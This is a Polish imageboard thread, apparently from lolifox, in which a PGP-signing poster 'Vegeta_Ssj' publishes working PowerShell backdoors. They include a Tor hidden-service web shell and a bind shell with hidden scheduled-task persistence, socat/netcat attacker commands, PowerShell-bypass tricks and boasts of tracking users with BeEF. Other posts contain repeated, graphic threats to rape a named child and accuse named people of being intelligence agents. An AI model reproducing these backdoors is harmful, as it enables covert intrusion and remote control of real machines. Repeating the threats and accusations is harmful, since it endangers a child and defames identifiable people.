nnABMuWhu+DQqaSTPDFs4+TjpCv+s8KJ7+6hxRoMcARUdKsjnas=

=RHbA

—–END PGP SIGNATURE—–


 No.35762

Dobre


 No.36015

—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA512

Dlaczemu tor browser jest takim ciekawym wektorem dla takujacego? Bo pozwala oominac FW i

wypuscic na swiat web shella do wygodnego zarzadzania.

Backdoor stacji z tor browserem bez POSWIADCZEN ADMINISTRACYJNYCH.

https://pastebin.com/7psanGcM

—–BEGIN PGP SIGNATURE—–

iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl77clxfFIAAAAAALgAo

aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2

NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK

CJYcKAP+Kvgg8oa0CpeAs7Sc3+6liI4G6XLgV6O+Yyy3oZE9HRvhDgwpc4ckb0oU

bsyJPQDzWON6M22W7bi++bY6Uobq6OF/sZPPIFrr5GwzCkwe89LVJLc3PpfNnQF7

tyiIohH4CnvFlDnIkT6hw2oXgWKRfmnZHGn/dhePTJuCk6eycZk=

=r0ue

—–END PGP SIGNATURE—–

___________

/ Vegeta_Ssj : Windows Backdoor without \

\ Admin, Bypass FW with Tor Browser /

—————————————

\ ^__^

\ (oo)\___

(__)\ )\/\

||—-w |

|| ||

https://i.postimg.cc/g2RpjWTZ/webshell.png

Find torrc file:

PS C:\Users\IEUser> Get-Childitem -recurse -filter torrc

Directory: C:\Users\IEUser\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor

Mode LastWriteTime Length Name

- - - —- ————- —— —-

- - - -a—- 6/29/2020 12:44 PM 3060 torrc

Left surprise:

$torrcpath = "C:\Users\IEUser\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\torrc"

$conf = "HiddenServiceDir C:/Users/IEUser/Desktop/Tor Browser/Browser/TorBrowser/Data/Hidden`nHiddenServicePort 80 127.0.0.1:8080"

$conf | Add-Content -Path $torrcpath

$hostname = "C:\Users\IEUser\Desktop\Tor Browser\Browser\TorBrowser\Data\Hidden\hostname"

PS C:\Users\IEUser\> cat $hostname

4jq55x4lxjhvsbjhqdsjxsevswx34fdt2xjyuduo6tr2www2p3owk8qd.onion

Download webshell:

$url = "https://pastebin.com/raw/h59LJpni";$output ="$pwd\web-shell.ps1"

Invoke-WebRequest -Uri $url -OutFile $output

Create backdoor | sheduled task:

PS C:\Users\IEUser\Desktop> schtasks.exe /CREATE /SC DAILY /TN "Legit as Fucked" /TR "powershell -windowstyle hidden C:\Users\IEUser\Desktop\web-shell.ps1 /ST 15:27

SUCCESS: The scheduled task "Legit as Fucked" has successfully been created.

#start-process PowerShell.exe -arg $pwd\web.ps1 -WindowStyle Hidde


 No.36016

>>36015

>hxxps://pastebin.com/7psanGcM

nie klikać w żadne linki od cwela Vegety


 No.36019

—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA512

>nie klikać w żadne linki od cwela Vegety

Dobrze. Boj sie :)

—–BEGIN PGP SIGNATURE—–

iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl77dsVfFIAAAAAALgAo

aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2

NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK

CJZt4AP/ayP/EktXoVeFnn5fT7iIPEQsWIi6OmcFEMawfkjnRnKlGf9efc7XRx+3

jl1ehU+5YiafOUGPvYdEyjG046DOHVOFFveJKAj3ps+KTufPJiFrdMUt8pKdqiHR

qjfR1HiFIV2jkoNlERsaomgHiKsNs7WtE/hLDMkFv+Jj/HXhJsk=

=buZs

—–END PGP SIGNATURE—–


 No.36020

>>36019

gdybym się bał to nie planowałbym brutalnego gwałtu na Monice Legowicz


 No.36023

—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA512

A jak ci sie Millerku podoba web shell bez admina?

—–BEGIN PGP SIGNATURE—–

iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl77eX5fFIAAAAAALgAo

aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2

NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK

CJY4uwP+KVnUhLe9VjmV7jZ0Cqz6JcT83d+Xpe/lYrXTzfuX6IBT1Y/X3NDuAe6t

Eb+70KZ406vPQWDgQgqRDNUOSCgoh/jMkAl0oEw7vAi60KU3K4fQ6OTKi1qb512d

qFAbetp8n8DAh/m5bfB4H7Fh9WqgQqNXTC+R3CGzhDYR+356CNA=

=ND8A

—–END PGP SIGNATURE—–


 No.36026

>A jak ci sie Millerku podoba web shell bez admina?

Pytasz prawdziwego Millera czy osobę, którą uparcie, acz mylnie, uważasz za Millera?


 No.36027

>>36023

>A jak ci sie Millerku

R.V.Miller to Piotr Konieczny

>podoba web shell bez admina?

my używamy Whonix głupku, ciekawe kto odpali twoje gówniane malware na windows


 No.36028

My to kto?


 No.36029

>>36028

>My to kto?

wy psy z SKW

a my lolifoksiarze


 No.36030

>>36023

Polisa domenowa ustawiona przez informatyka z komendy blokuje mi na kompie powershella, więc nie mam jak przetestować, sorki. Jutro przyjdę z laptopem prywatnym i sprawdzę raz dwa, OK?


 No.36031

—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA512

>Polisa domenowa ustawiona przez informatyka z komendy blokuje mi na kompie powershella

daj shella, pokaze ci jak odpalic powershella bez powershella :)

—–BEGIN PGP SIGNATURE—–

iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl77esBfFIAAAAAALgAo

aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2

NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK

CJYfUgP/dvFQMoDF8DElbBqNM6JhZRnJ2ihz+6TvlQH5DDwPyQHyPYk5Kqn5wg/p

Rh/OtMMPmIwpssvmh8TVDtVHQ4NtZVzdTjulOKbiqGrvBVczTanJvqoTL9Z6mrDm

mN3pMfcuk+Am/QKdHn7+yv4GFvF+9okNdsVleQg65ApDg6cNMLg=

=GPOp

—–END PGP SIGNATURE—–


 No.36032

—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA512

informatyk z komendy brzmi torche jak miller z roztrojeniem jazni xDDD

—–BEGIN PGP SIGNATURE—–

iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl77ewNfFIAAAAAALgAo

aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2

NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK

CJbo/gP/SOPtIF0uAHoJdLJ3+JGRsZCaVJXpK1JyHraESlFXB+140kEDapl8rNqD

qZNTi4pKALvfBgK9gV2TbkB1zm5A+2F/xHy973Jnc/W/y7MMtf/fj2OpmXnh7LIq

J5ztnGBX/d6D4MPC0R6ukQkgQwy2Wrh6XkSBQ/8GOjJR2NDzyJw=

=AycA

—–END PGP SIGNATURE—–


 No.36033

>A jak ci sie Millerku podoba web shell bez admina?

Odpowiada nie-Miller z MON: Podoba mi się bardzo, bo jesteś w swoich atakach taki minimalny, nie wyciągasz ciężkich armat na totalnych idiotów z lolifoxa, tylko takie lajtowe metody, a zarazem sprytnie wykorzystujące ich głęboką naiwność i całkowity brak opsec.

To dobre wyważenie środków w proporcji do kompetencji atakowanych celów bardzo podoba się także moim kolegom. Trzymamy kciuki za dalsze sukcesy i czekamy aż wydobrzejesz, by nawiązać ciekawą współpracę.


 No.36034

>daj shella, pokaze ci jak odpalic powershella bez powershella :)

CMD też mi informatyk zablokował :(


 No.36035

>>36032

>informatyk z komendy brzmi torche jak miller z roztrojeniem jazni xDDD

R.V.Miller to Piotr Konieczny

>>36033

>Odpowiada nie-Miller z MON:

odpowiada Łukasz Jędrzejczak z SKW

>Podoba mi się bardzo, bo jesteś w swoich atakach taki minimalny, nie wyciągasz ciężkich armat na totalnych idiotów z lolifoxa, tylko takie lajtowe metody, a zarazem sprytnie wykorzystujące ich głęboką naiwność i całkowity brak opsec.

ilu już złapaliście? dlaczego alarmy bombowe nadal trwają?

>To dobre wyważenie środków w proporcji do kompetencji atakowanych celów bardzo podoba się także moim kolegom. Trzymamy kciuki za dalsze sukcesy i czekamy aż wydobrzejesz, by nawiązać ciekawą współpracę.

legendowanie, Vegeta od dawna współpracuje z SKW


 No.36036

—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA512

Sposobow jest kilka, dwa najpopularniejsze:

>CMD też mi informatyk zablokował :(

xDDDDDDDD gupki

rundll32.exe PowerShdll.dll,main

SyncAppvPublishingServer.vbs

qmasz?

—–BEGIN PGP SIGNATURE—–

iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl77fApfFIAAAAAALgAo

aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2

NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK

CJYUlQP/R5L7m8dE5N5kW5vLb7NtN5RqwPXRyVyo2W7ZY1D6FhfCN/mROlVOdXlN

DwBT0XOQsAdUF3PFo+kojeOALLI2U3/pwUBxu4/B70Z0tMvtk26oeRwd3On8qWAK

jT1qJcOlvLV10I5ytlaOyqFqwTrEAPiMjsd/VG0Mp2UEaj7o2NY=

=n4c7

—–END PGP SIGNATURE—–


 No.36039

Sposobow jest mnogosc Millerze.


 No.36040

AHAHAHA dobre XD dawno sie tak nie usmialem. noby moze by sie daly zlapac na webshella np u mnie takie cos nie przejdzie bo malware by musial obejsc FW ktory blokuje wszelkie boczne kanaly wiec nawet jesli udaloby sie wedrzec wirusowi do systemu to i tak nie nawiaze poloczenia z serwerem C2 a dodatkowo sam sie zdemaskuje i odrazu trafi to bazy danych m.in av XD, potem proxy z czego pierwszy to filtrujacy wszelkie dane a drugi to av i trzeci dla IDS ktory gdy tylko wykryje pierwszy podejrzany pakiet odrazu banuje atakujacego w FW i w sieci globalnej XD. Takze ten powodzenia zycze XD.


 No.36041

>rundll32.exe PowerShdll.dll,main

"Nie można odnaleźć modułu"


 No.36043

>odrazu banuje atakujacego w FW i w sieci globalnej

Czyli odcina cię od sieci Tor :)

Gratuluję "opsec" :)


 No.36044

>36040

to jak korzystasz z tora?


 No.36046

>>36039

>Sposobow jest mnogosc Millerze.

R.V.Miller to Piotr Konieczny

>>36040

>m.in av XD, potem proxy z czego pierwszy to filtrujacy wszelkie dane a drugi to av i trzeci dla IDS

ale głupek

>>36044

>to jak korzystasz z tora?

nie korzysta bo to głupek policyjny od wymyślonych łańcuszków VPN → VPN → VPS → RDP


 No.36048

Mieler tobie niebawem klawy nie styknie.


 No.36051

>>36048

>Mieler tobie niebawem klawy nie styknie.

planuję brutalny gwałt na małej Monice Legowicz

moim kutasem a jak będzie wierzgać to śrubokrętem


 No.36054

—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA512

Calowkite usuniecie daje zludne poczucie bezpieczenstwa.

Powershell pod winda jest zawsze tylko trzeba wiedziec gdzie go znalezc i skompilowac.

zalokowanie powershell.exe tez nie zaswietnie.

Sa zewnetrzne bibliotek ktore dostarczone na stacje pozwola odpalic powershell

bez powershell.

>>rundll32.exe PowerShdll.dll,main

"Nie można odnaleźć modułu"

tak- chcialem zobaczyc czy jestes naprawde tak ciezkim idiota zeby to wpisac xDDDDD

aj kiedy ty miller dorosniesz… na kazdym kroku mi udowadniasz, ze jestes tu jak frodo co zgubil droge

do mordoru xDDD

poczytaj sobie: https://medium.com/@Bank_Security/how-to-running-powershell-commands-without-powershell-exe-a6a19595f628

—–BEGIN PGP SIGNATURE—–

iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl77fo9fFIAAAAAALgAo

aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2

NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK

CJYWKAQAhdLUjLTXAx8fu7OlrZWUSozJ79otlFIRNliRabYws6Lmd/iJhJ7vAI+P

302pHmxl0ZtTSak9u8AhQza4vkPsC4ophmafbbU+farJAxLcJe6vDWIFhg0geGD2

cf4zBq+VLLGD0XbHcNv+zV7zm+9asmbM5FzHFVutOh9jNXNLJWM=

=nBlx

—–END PGP SIGNATURE—–


 No.36055

>>36054

>Powershell pod winda

pod jakim windowsem debilu? my używamy Whonix

>aj kiedy ty miller dorosniesz…

przecież to pisał Łukasz Jędrzejczak z SKW


 No.36056

>tak- chcialem zobaczyc czy jestes naprawde tak ciezkim idiota zeby to wpisac xDDDDD

Wtrąca się nie-Miller z MON. Mam nadzieję, że umiesz już lekko odróżniać mnie od prawdziwego, niepodrabialnego Millera?


 No.36058

>Wtrąca się nie-Miller z MON. Mam nadzieję, że umiesz już lekko odróżniać mnie od prawdziwego, niepodrabialnego Millera?

Nie. Wzbudzasz jedynie moje coraz wikesze zdziwienie xD Miller xD


 No.36059

zdradzil cie anty flood xD


 No.36060

>>36056

>Wtrąca się nie-Miller z MON.

czyli Łukasz Jędrzejczak z SKW

>Mam nadzieję, że umiesz już lekko odróżniać mnie od prawdziwego, niepodrabialnego Millera?

R.V.Miller to Piotr Konieczny


 No.36061

>>Wtrąca się nie-Miller z MON. Mam nadzieję, że umiesz już lekko odróżniać mnie od prawdziwego, niepodrabialnego Millera?

>Nie.

No OK. Jak znudzi Ci się policyjny sitkom a zainteresują Cię sprawy poważne, to daj znać.


 No.36062

>zdradzil cie anty flood xD

he?


 No.36063

post millera i nie millera pojawiaaja sie w bardzo regularnym odstepie od siebie, zaraz po tym jak anty flood wpusci drugi post, ze niby w tym samym momencie pisales ale posty zostaly dodane jeden po drugim xDD


 No.36064

ja bardzo chetnie z tobo prozmawiam ale nie przez bm

[email protected]


 No.36065

>>36063

>post millera

R.V.Miller to Piotr Konieczny

nie postuje w tym temacie

>i nie millera

czyli Łukasza Jędrzejczaka z SKW

postuje w tym temacie

>pojawiaaja sie w bardzo regularnym odstepie od siebie, zaraz po tym jak anty flood wpusci drugi post, ze niby w tym samym momencie pisales ale posty zostaly dodane jeden po drugim xDD

niezła schizofrenia


 No.36066

miller od tak dawna mi to mowisz, ze nie robi to juz na mnie wrazenia. zmutowalem.


 No.36067

>>36066

>miller od tak dawna mi to mowisz, ze nie robi to juz na mnie wrazenia. zmutowalem.

a Beata Legowicz też już oswoiła się z myślą że jej córka zostanie brutalnie zgwałcona?


 No.36068

>post millera i nie millera pojawiaaja sie w bardzo regularnym odstepie od siebie

Wstydź się takiej lipy czarnoleskiej.

Posty "jędrzejczakowca' też są tak "skorelowane" bo reaguje jak automat i wrzuca swoje automatyczne (mózgowo) teksty.

Mamy tu nieuleczalnego "jędrzejczakowca", Ty czasami popadasz w bycie "millerowcem", ale Ty możesz jeszcze przestać, gdy neurony się ustabilizują i nadmiar acetylocholiny nie będzie produkował w Twoim mózgu złudzeń "wzorców" i "prawidłowości".

Bibliografia:

https://pl.wikipedia.org/wiki/Apofenia


 No.36069

>ja bardzo chetnie z tobo prozmawiam ale nie przez bm

To nie jest trudny program, dasz radę. Raz Ci się już przecież udało.


 No.36070

nie popadam, mam trzecie oko,

pamietaj: MO TY WA CJA


 No.36071

>>36067

>a Beata Legowicz też już oswoiła się z myślą że jej córka zostanie brutalnie zgwałcona?

nie możemy się dogadać żebym też wziął udział w ruchaniu Moniki? w czwórkę (wszyscy lolifoksi + Monika) będzie fajniej


 No.36073

>pamietaj: MO TY WA CJA

A

PO

FE

NIA


 No.36074

Jak jeszcze nie wiedzieliscei ze truje to beefem to zbieralem informacje, logi i korelwoalem naglowiki refferer, wiem wszystko :D skad kto przyszedl, po co szedl i z jakiego adresu, osadzalem ciasteczka, zeby was nie mylic xD lipe to ty mozesz sadzic, ale za domem xD


 No.36075

wystarczylo pare linkow wkleic z dostepem do serwera, i czlowiek wie wszystko


 No.36076

>>36068

>Ty czasami popadasz w bycie "millerowcem"

R.V.Miller to Piotr Konieczny

>>36069

>To nie jest trudny program, dasz radę. Raz Ci się już przecież udało.

bitmessage to honeypot

a kontakt pomiędzy Łukaszem Jędrzejczakiem z SKW i Vegetą jest nieprzerwany

>>36071

>nie możemy się dogadać żebym też wziął udział w ruchaniu Moniki? w czwórkę (wszyscy lolifoksi + Monika) będzie fajniej

przywiążę Monikę do kaloryfera w mojej piwnicy więc będzie to możliwe

>>36074

>Jak jeszcze nie wiedzieliscei ze truje to beefem to zbieralem informacje, logi i korelwoalem naglowiki refferer, wiem wszystko :D skad kto przyszedl, po co szedl i z jakiego adresu, osadzalem ciasteczka, zeby was nie mylic xD lipe to ty mozesz sadzic, ale za domem xD

zrozum wreszcie że każdy lolifoksiarz korzysta z Tor Browser


 No.36078

>>36076

>przywiążę Monikę do kaloryfera w mojej piwnicy więc będzie to możliwe

sprawa załatwiona

kontakt tam gdzie zwykle


 No.36079

SKW = siajanski kontrwywaid wojskowy :D

blogoslawic ciasteczka i naglowek referrer :)

polecam, mozna sie bardzo duzo dowiedziec


 No.36080

>>36079

>SKW = siajanski kontrwywaid wojskowy :D

>blogoslawic ciasteczka i naglowek referrer :)

to mi przypomniało jak głupki ze służb wyłączały ciasteczka w Tor Browser i miały invalid referrer xD


 No.36081

>>36074

Beef nie działa bez JS.

Żadna z wirtualek używanych przez nas do babrania się w lolifox nie ma aktywnego JS w przeglądarkach. Nie mówię o dziurawym jak gacie cygana NoScript, ale wyłączeniu JS w domyślnych opcjach przeglądarek.

Kogokolwiek więc nie złapałeś za mosznę, nie jest to nikt z nas.


 No.36082

>>36081

>Żadna z wirtualek używanych przez nas do babrania się w lolifox nie ma aktywnego JS w przeglądarkach.

kłamstwo - pracownik SKW regularnie usuwa swoje posty


 No.36083

>Kogokolwiek więc nie złapałeś za mosznę, nie jest to nikt z nas.

ta… xDDDDD korelowalem logi z beefa, z logami z serwerow gdize dawalem linki, naglowki tam z godzinami wpisow. Uwierz mi: to pasuje jak wtyczka do kontaktu.


 No.36084

>kłamstwo - pracownik SKW regularnie usuwa swoje posty

Zespół Fregoliego usuwa posty, ćpunie.


 No.36085

odezwij sie na jid: chetnie pokaze :)


 No.36086

tez sie nie spodziewalem, ze przyjdziemy wylapac pedofilow, bomberow a nadzieje na dwoch zdemorlaizowanych kielbasiarzy


 No.36087

>Uwierz mi: to pasuje jak wtyczka do kontaktu.

W takim razie zalecam, byś poza chwytami ofensywnymi pogłębił i ulepszył umiejętności analityczne. Częściowo usprawiedliwia Cię metabolizowanie resztek narkotyków w mózgu, ale pewne rzeczy są po prostu czarnoleską lipą w Twoim wykonaniu. Skoro rozmawiamy nieoficjalnie, to podpowiadam życzliwie, że takie "rzucanie się na wnioski" jest lekko dyskwalifikujące, jeśli ktoś szuka poważnej pracy u nas. Naginasz obserwacje do tezy, a powinieneś wyciągać wnioski z obserwacji.

Powodzenia!


 No.36088

ale ty sie nie grzej, prawodobponie bedziemy mieli okazje przedysttukowac to osobiscie xDDDDD


 No.36089

>odezwij sie na jid: chetnie pokaze :)

Nie dotykamy tego świństwa.

Zapraszam na BM.


 No.36090

nie szukam pracy w policji.


 No.36091

poza tym mowilem ci, ze mam prace, przeciez ja musze cos jesc a od listopada nie kradne


 No.36092

>ale ty sie nie grzej, prawodobponie bedziemy mieli okazje przedysttukowac to osobiscie xDDDDD

Jeszcze nie. Musisz wyczyścić mózg z resztek chemii, wtedy jest szansa na pogłębiony kontakt, inny niż pogaduszki-heheszki na ruskiej desce. Na razie pokaż nam co umiesz i raczej ukrywaj się z tym, co Ci nie wychodzi.


 No.36093

ani nie sprzedaje tematu


 No.36094

>nie szukam pracy w policji.

MON != MSWiA


 No.36095

>Na razie pokaż nam co umiesz i raczej ukrywaj się z tym, co Ci nie wychodzi.

Moiw miller co chcesz. Przekonujesz siebie nie mnie :) Ja wiem, mam dane, ty masz ptaszka w pupie.


 No.36097

>Ja wiem, mam dane

Kiedyś, gdy porozmawiamy osobiście, obaj pośmiejemy się z tych Twoich danych i Twojego "wiedzenia".

A na razie odstawmy ten żenujący aspekt i daj wycisk lolifoksiarzom.


 No.36098

jakim lolifoksiarzom? xDDDDDDDD


 No.36099

>>36095

>Moiw miller co chcesz

R.V.Miller to Piotr Konieczny

osoba z którą Vegeta udaje dyskusję to Łukasz Jędrzejczak z SKW


 No.36109

kto to sa lolifoxiarze?


 No.36120

>>36020

>gdybym się bał to nie planowałbym brutalnego gwałtu na Monice Legowicz

gdybyś się nie bał, już dawno byś to zrobił


 No.36122

>>36051

>planuję brutalny gwałt na małej Monice Legowicz

powinieneś planować swój pogrzeb lub brutalne zgwałcenie przez kolegów z celi

>moim kutasem a jak będzie wierzgać to śrubokrętem

będziesz martwy w rowie, a twój kutas wyleci w powietrze


 No.36124

>>36071

>a Beata Legowicz też już oswoiła się z myślą że jej córka zostanie brutalnie zgwałcona?

myślałeś, że odpiszę i stanę po stronie Beaty Legowicz?

od pewnego czasu, nie licząc ataków spamu, nie piszę postów, nie angażuję się w rozmowę i nie będę

nie dowiedziałem się kim jest Pani Martyna, nadal nie wiem, ale ty uważasz że jestem rozpracowany


 No.36127

>>35661

>Łukasz Jędrzejczak z SKW jest zesrany że przyjdą ludzie z webinara

Adam nie zrobił reklamy Lolifox, nie było napływu nowych użytkowników

atak spamu był sprawny, efektywny i skuteczny - całe forum zostało zniszczone


 No.36132

>spam jest na zlecenie Łukasza Jędrzejczaka z SKW

jutro znowu coś się stanie, istotne tematy spadną

masz je zapisane, ale sporo czasu zajmie ci ich przywrócenie

czas przeznaczysz na ponowne wklejanie postów, zamiast na wyrządzanie szkód Polsce, mniej alarmów zostanie wysłanych


 No.36150


 No.36639

https://pastebin.com/zTB6H8Tr

—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA512

_________

/ Vegeta_Ssj : Windows Bind Shell Tor \

\ Hidden Service Backdoor /

————————————-

\ ^__^

\ (oo)\___

(__)\ )\/\

||—-w |

|| ||

Target:

Download Windows Tor Expert Bundle, add configuration

$newtorpath = $env:USERPROFILE + "\AppData\Roaming\"

New-Item -Path $newtorpath -Name "tor" -ItemType "directory"

$torrcpath = $newtorpath + "\tor"

$conf = "HiddenServiceDir $torrcpath\hidden`nHiddenServicePort 80 127.0.0.1:8080"

New-Item -Path $torrcpath -Name "torrc" -ItemType "file" -Value "$conf"

$url = "https://www.torproject.org/dist/torbrowser/9.5/tor-win32-0.4.3.5.zip";$output ="$torrcpath\tor.zip"

Invoke-WebRequest -Uri $url -OutFile $output;Expand-Archive -LiteralPath $output

Bind Shell with Hidden Service, add sheduled tasks:

#file: start-tor.ps1

Start-Process "C:\Users\IEUser\AppData\Roaming\tor\tor\Tor\tor.exe" -WindowStyle Hidden

schtasks.exe /CREATE /SC DAILY /TN "Legit as Fucked2" /TR "powershell -windowstyle hidden C:\Users\IEUser\Desktop\start-tor.ps1" /ST 20:00

#file: bind-reverse-shell.ps1

$listener = [System.Net.Sockets.TcpListener]8080;$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()

schtasks.exe /CREATE /SC DAILY /TN "Legit as Fucked2" /TR "powershell -windowstyle hidden C:\Users\IEUser\Desktop\bind-reverse-shell.ps1" /ST 20:00

Attacker:

Socat tunnel, bind via netcat:

[email protected]:~# socat TCP4-LISTEN:8888,reuseaddr,fork SOCKS4A:127.0.0.1:cc5uwjc3cmst2bst467yyj4ebo5cupcnfj2zr6irsnbplqy3q5qlh2id.onion:80,socksport=9050

[email protected]:~# nc -nv 127.0.0.1 8888

Enjoy:

[email protected]:~# nc -nv 127.0.0.1 8888

(UNKNOWN) [127.0.0.1] 8888 (?) open

whoami

msedgewin10\ieuser

PS C:\Users\IEUser\AppData\Roaming\tor\hidden>

—–BEGIN PGP SIGNATURE—–

iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl79xDxfFIAAAAAALgAo

aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2

NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK

CJakFwP9EpfHBbWPXnfHBpT3gcQ8twoFYvbcqIJPsb3bA7eWcv6sLo50BaZOTr3Q

cnCvXurrRuyCq4p5celmlHmCwqHmzlxFT+wLSEnsxRKyH8qjhRbxwSVHBYe78kZu

sFcoaTlRjq9L8Y1UG1FjlyAWtLVYa2jnopO56IlC0giJ/kNYsZU=

=SnOM

—–END PGP SIGNATURE—–


 No.36661

:)
[Return][Go to top][Catalog][Post a Reply]
Delete Post [ ]
[]
[ Home / Boards / Banlist / Search / Login / Tor mirror / Overboard / Create / Wiki (BETA) ]
Top threads